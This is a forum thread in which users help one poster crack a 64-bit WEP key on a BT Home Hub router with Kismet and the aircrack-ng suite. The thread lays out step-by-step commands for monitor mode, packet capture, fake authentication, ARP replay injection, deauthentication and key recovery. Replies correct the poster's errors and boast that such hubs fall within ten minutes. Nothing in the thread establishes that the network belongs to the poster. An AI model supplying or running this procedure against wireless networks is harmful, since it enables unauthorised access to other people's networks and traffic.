Hello,

Im quite new to this therefore some of my commands might be wrong.

Im trying to crack a 64 bit WEP on channel 3.

Im the only one trying to use the routers wireless signal therefore I think I need to do a fake association i.e. make another a client. This is what I do (made up MAC's):

1// Kismet c, s, enter, L to lock card to channel
kismet

2// monitor mode enabled
airmon-ng start eth1 11

3// Start packet capture on channel 3
airodump-ng -w capture -c 3 eth1

4// This works to get association
aireplay-ng -1 0 -e BTHomeHub-3AD0 -a 00:14:7F:91:D4:0D -h 00:09:5B:C5:C2:B5 eth1

5// Start capture
aireplay-ng -3 -b 00:14:7F:91:D4:0D -h 00:09:5B:C5:C2:B5 -x 600 eth1

6//
aireplay-ng -0 -e BTHomeHub-3AD0 -a 00:14:7F:91:D4:0D -h 00:09:5B:C5:C2:B5 eth1

7// Aircrack
aircrack-ng -f 4 -n 64 capture-11.cap

Can someone spot the error cos I just cannot get it working.

Cheers

you can try fragmentation attack ,,,, it is fast ,,, good luck

on step 2 try putting: airmon-ng start eth1 3
and your aircrack file in your command should be capture-01

Doesn't kismet make the card go into monitor mode therefore not needing to start airmon-ng.

I dont think centrino cards are supported for packet injection.

Mines an Intel PRO/Wireless 3945ABG with the ipw3945-1.2.0 driver.

What does anyone else think?

Cheers

i use bt v.1 as it puts ya card in monitor as soon as u run kismet as for the bthomehub they crack sooooo easyly but i cant crack 1 with bt v2 as it adds wifio then ath0 then ath1 then it says my card dont monitor id stay with bt v.1 does bthubs in 10mins max as long as the power is above 5 in airodump

To put your card in monitor mode use this command:

'iwconfig DEVICE mode monitor'
(DEVICE is you interface you can find out by starting kismet.)

The list of options from aireplay-ng:
Code:
*Attack 0: Deauthentication
*Attack 1: Fake authentication
*Attack 2: Interactive packet replay
*Attack 3: ARP request replay attack
*Attack 4: KoreK chopchop attack
*Attack 5: Fragmentation attack

You're using option 1. I would recommend trying 2, which will allow you to repeatedly spam the router with data from live traffic passing to/from it...it usually has a better chance of spurring up traffic.

I'd also recommend flipping through some of the options available for aireplay here on the developer's site.

this works for me......


airodump-ng -c 3 -w capture01 ath1 (IV Capture) add -ivs for only capturing iv's

aireplay-ng -a mac -h fakemac -e apname ath1 -1 0 (Fake Auth)

aireplay-ng -b mac -h fakemac ath1 -3 (ARP replay)

aircrack-ng capture01 (Find Key)

aircrack-ptw capture01 (Find Key Faster with less IV's)

hope that helps

arvee
that works for me too :)
i also add -x 1000 to my ARP replay

hey baxter why do you add -x 1000? I know that "-x" is the number of packets per second but why do you choose 1000? can you also go higher? what are your experiences?


arvee
that works for me too :)
i also add -x 1000 to my ARP replay

i think -x 1024 is the highest. dont know why i only use -x 1000 but my ARP's go twice as fast when i do. cuts my time in half. im using a senao 200mw FW 1.7.4 with hostap drivers.

heres a video with -x 1000, its not two fast at that time cause i was injecting two ap's with only one card and no clients plus i was running xvidcap which slows everything down too. but you'l get the idea.
http://www.youtube.com/watch?v=kB2Hv6NuKWM